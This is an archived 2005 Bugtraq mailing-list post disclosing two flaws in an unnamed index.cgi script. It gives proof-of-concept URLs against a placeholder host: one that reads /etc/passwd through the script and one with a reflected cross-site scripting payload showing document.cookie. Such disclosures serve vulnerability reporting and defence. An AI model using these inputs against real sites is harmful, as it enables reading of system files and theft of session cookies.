[38579] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

index.cgi script XSS + file show

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 16:12:57 2005

Date: 24 Apr 2005 21:08:19 -0000
Message-ID: <20050424210819.29442.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: fireboy fireboy <fireboynet@webmails.com>
To: bugtraq@securityfocus.com



Tunis 24/04/2005
BUG found by fireboy
fireboy@webmails.com



THERE ARE SOME BUGS IN 	index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM 

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 



1)file showing
http://www.target.com/index.cgi?/etc/passwd


2)CSS
http://www.target.com/index.cgi?&lt;script&gt;alert(document.cookie)&lt;/script&gt;


greetz to all magattack members www.magattack.tk


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38579] in bugtraq

index.cgi script XSS + file show

daemon@ATHENA.MIT.EDU (fireboy fireboy)Mon Apr 25 16:12:57 2005

daemon@ATHENA.MIT.EDU (fireboy fireboy)
Mon Apr 25 16:12:57 2005